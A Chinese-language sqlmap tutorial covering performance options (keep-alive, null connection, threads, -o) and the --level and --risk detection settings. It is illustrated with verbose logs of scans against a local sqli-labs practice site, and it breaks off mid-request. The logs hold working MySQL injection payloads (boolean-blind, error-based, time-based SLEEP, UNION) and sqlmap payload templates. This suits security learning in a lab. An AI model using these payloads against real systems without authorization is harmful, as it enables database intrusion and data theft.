文章目录
一、Sqlmap性能优化
1.sqlmap设置持久HTTP连接
sqlmap中可以设置连接为持久连接,HTTP报文中设置connection:keep-alive;
长连接可以减少连接开销,但是会占用服务器资源。
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner -v 5
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:06:39 /2020-02-29/
[17:06:39] [DEBUG] cleaning up configuration parameters
[17:06:40] [DEBUG] setting the HTTP timeout
[17:06:40] [DEBUG] setting the HTTP User-Agent header
[17:06:40] [DEBUG] creating HTTP requests opener object
[17:06:40] [INFO] resuming back-end DBMS 'mysql'
[17:06:40] [INFO] testing connection to the target URL
[17:06:40] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: keep-alive
[17:06:40] [DEBUG] declared web page charset 'utf-8'
[17:06:40] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:06:40 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6613=6613 AND 'wyLD'='wyLD
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(4185=4185,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'aqQg'='aqQg
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4770 FROM (SELECT(SLEEP(5)))RbSZ) AND 'xahz'='xahz
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9218' UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x4e6a506169494f6c654a42614659426f70457a4f77454d4f494c415144525967626d41745067674a,0
x71706a7871)-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[17:06:40] [INFO] the back-end DBMS is MySQL
[17:06:40] [INFO] fetching banner
[17:06:40] [DEBUG] resuming configuration option 'string' ('Your')
[17:06:40] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:06:40] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 17:06:40 /2020-02-29/
显然,出现了Keep-Alive: timeout=5, max=100,假如不加参数--keep-alive显示的是Connection: close。
在使用长连接是不能设置代理,否则会出现冲突,例如:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner --proxy "http://218.18.158.216:8000" -v 5
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:20:32 /2020-02-29/
[17:20:32] [DEBUG] cleaning up configuration parameters
[17:20:32] [DEBUG] setting the HTTP timeout
[17:20:32] [DEBUG] setting the HTTP User-Agent header
[17:20:32] [DEBUG] setting the HTTP/SOCKS proxy for all HTTP requests
[17:20:32] [DEBUG] creating HTTP requests opener object
[17:20:32] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
[17:20:33] [INFO] resuming back-end DBMS 'mysql'
[17:20:33] [INFO] testing connection to the target URL
[17:20:33] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: keep-alive
[17:20:34] [DEBUG] declared web page charset 'utf-8'
[17:20:34] [TRAFFIC IN] HTTP response [#1] (404 Not Found):
Date: Sat, 29 Feb 2020 09:20:33 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-Cache: MISS from KX-S42-Web-85
X-Cache-Lookup: MISS from KX-S42-Web-85:3128
Via: 1.0 KX-S42-Web-85 (squid/3.1.23)
Connection: close
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1
[17:20:34] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
[17:20:38] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[*] ending @ 17:20:38 /2020-02-29/
显示Connection: keep-alive,即如果设置了代理即便设为长连接还是为连接关闭,即此时设置--keep-alive无效。
2.sqlmap设置不接收HTTP Body
参数:
--null-connection
sqlmap中设置空连接,表示不接受HTTP当中的Body;
可以直接获得HTTP响应的大小而不用获得HTTP响应体;
常在盲注时使用,不接收HTTP Body可以降低网络带宽消耗。
在Kali中测试:
sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --null-connection --banner -v 5
打印
___
__H__
___ ___[']_____ ___ ___ {1.3.8#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:43:01 /2020-02-29/
[17:43:01] [DEBUG] cleaning up configuration parameters
[17:43:01] [DEBUG] setting the HTTP timeout
[17:43:01] [DEBUG] setting the HTTP User-Agent header
[17:43:01] [DEBUG] creating HTTP requests opener object
[17:43:01] [INFO] resuming back-end DBMS 'mysql'
[17:43:01] [INFO] testing connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [DEBUG] declared web page charset 'utf-8'
[17:43:01] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:43:00 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [INFO] testing NULL connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#2]:
HEAD /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [TRAFFIC IN] HTTP response [#2] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#3]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Accept-encoding: identity
Cache-control: no-cache
Range: bytes=-1
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [TRAFFIC IN] HTTP response [#3] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#4]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [TRAFFIC IN] HTTP response [#4] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
Vector: UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:43:01] [INFO] the back-end DBMS is MySQL
[17:43:01] [INFO] fetching banner
[17:43:01] [DEBUG] resuming configuration option 'string' ('Your')
[17:43:01] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:43:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:43:01] [WARNING] you haven't updated sqlmap for more than 210 days!!!
[*] ending @ 17:43:01 /2020-02-29/
3.sqlmap设置多线程
参数:
--thread
sqlmap中设置同时发送多少个HTTP请求的多线程。
在Kali中测试:
qlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner -v 5
打印
___
__H__
___ ___[)]_____ ___ ___ {1.3.8#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:46:39 /2020-02-29/
[17:46:39] [DEBUG] cleaning up configuration parameters
[17:46:39] [DEBUG] setting the HTTP timeout
[17:46:39] [DEBUG] setting the HTTP User-Agent header
[17:46:39] [DEBUG] creating HTTP requests opener object
[17:46:40] [INFO] resuming back-end DBMS 'mysql'
[17:46:40] [INFO] testing connection to the target URL
[17:46:40] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:46:40] [DEBUG] declared web page charset 'utf-8'
[17:46:40] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:46:39 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
Vector: UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:46:40] [INFO] the back-end DBMS is MySQL
[17:46:40] [INFO] fetching banner
[17:46:40] [DEBUG] resuming configuration option 'string' ('Your')
[17:46:40] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:46:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:46:40] [WARNING] you haven't updated sqlmap for more than 210 days!!!
[*] ending @ 17:46:40 /2020-02-29/
很快便探测结束,可能是因为有缓存,在/root/.sqlmap/output/192.168.0.103目录下,删除后再次测试。
qlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner
打印
___
__H__
___ ___["]_____ ___ ___ {1.3.8#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:52:01 /2020-02-29/
[17:52:01] [INFO] testing connection to the target URL
[17:52:01] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:52:01] [INFO] testing if the target URL content is stable
[17:52:02] [INFO] target URL content is stable
[17:52:02] [INFO] testing if GET parameter 'id' is dynamic
[17:52:02] [INFO] GET parameter 'id' appears to be dynamic
[17:52:02] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[17:52:02] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[17:52:02] [INFO] testing for SQL injection on GET parameter 'id'
[17:52:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'ing provided level (1) and risk (1) values? [Y/n]
[17:52:05] [WARNING] reflective value(s) found and filtering out
[17:52:05] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:52:05] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[17:52:05] [INFO] testing 'MySQL inline queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:52:05] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:52:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:52:15] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[17:52:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:52:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:52:15] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:52:15] [INFO] target URL appears to have 3 columns in query
[17:52:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5685=5685 AND 'zDwo'='zDwo
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3544 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(3544=3544,1))),0x7176787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HmJC'='HmJC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2801 FROM (SELECT(SLEEP(5)))aNGQ) AND 'JWiB'='JWiB
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7025' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6355614c635050625177414166564173496f6c6558686978795257636b647a4b465a634b4a724275,0x7176787671),NULL-- ImLs
---
[17:52:17] [INFO] the back-end DBMS is MySQL
[17:52:17] [INFO] fetching banner
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:52:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:52:17] [WARNING] you haven't updated sqlmap for more than 210 days!!!
[*] ending @ 17:52:17 /2020-02-29/
4.一键优化
参数:
-o
添加此参数相当于同时添加下列三个优化参数:
--keep-alive--null-connection--threads=3
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -o --banner
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:10:58 /2020-02-29/
[18:10:59] [INFO] testing connection to the target URL
[18:10:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:10:59] [INFO] testing NULL connection to the target URL
[18:10:59] [INFO] testing if the target URL content is stable
[18:10:59] [INFO] target URL content is stable
[18:10:59] [INFO] testing if GET parameter 'id' is dynamic
[18:10:59] [INFO] GET parameter 'id' appears to be dynamic
[18:10:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:10:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[18:11:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:01] [WARNING] reflective value(s) found and filtering out
[18:11:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:11:01] [INFO] testing 'Generic inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:11:01] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:11:01] [INFO] testing 'MySQL inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:11:01] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:11:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:11:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:11:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:11:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:11:12] [INFO] target URL appears to have 3 columns in query
[18:11:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
---
[18:11:18] [INFO] the back-end DBMS is MySQL
[18:11:18] [INFO] fetching banner
[18:11:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:11:18] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 18:11:18 /2020-02-29/
如有必要,可以先去目录中删掉缓存再测试,效果会更明显。
二、sqlmap自定义检测参数
查看sqlmap帮助:
python sqlmap.py -hh
选择其中部分结果:
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--string=STRING String to match when query is evaluated to True
--not-string=NOT.. String to match when query is evaluated to False
--regexp=REGEXP Regexp to match when query is evaluated to True
--code=CODE HTTP code to match when query is evaluated to True
--smart Perform thorough tests only if positive heuristic(s)
--text-only Compare pages based only on the textual content
--titles Compare pages based only on their titles
包括了–level和–risk两个参数。
1.sqlmap设置检测等级
参数:
--level
此参数用于指定检测级别,有1~5共5级;
默认为1,表示做最少的检测,相应的,5级表示做最多的检测。
等级为1时检测get和post请求;
等级为2时检测cookies;
等级为3时检测user-agent和referer;
等级越高检测的内容也会越多。
更具体的可以查看sqlmap目录下的data\xml\payloads(旧版本的sqlmap可能目录不完全一致,可能是xml\payloads),内容示例如下:
<test>
<title>AND boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1,8,9</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test>
<title>OR boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype>
<level>1</level>
<risk>3</risk>
<clause>1,9</clause>
<where>2</where>
<vector>OR [INFERENCE]</vector>
<request>
<payload>OR [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test>
<title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1,9</clause>
<where>1</where>
<vector>OR NOT [INFERENCE]</vector>
<request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
测试举例:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner --level 2 -v 5
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:29:07 /2020-02-29/
[18:29:07] [DEBUG] cleaning up configuration parameters
[18:29:07] [DEBUG] setting the HTTP timeout
[18:29:07] [DEBUG] setting the HTTP User-Agent header
[18:29:07] [DEBUG] creating HTTP requests opener object
[18:29:08] [INFO] resuming back-end DBMS 'mysql'
[18:29:08] [INFO] testing connection to the target URL
[18:29:08] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1--banner HTTP/1.1
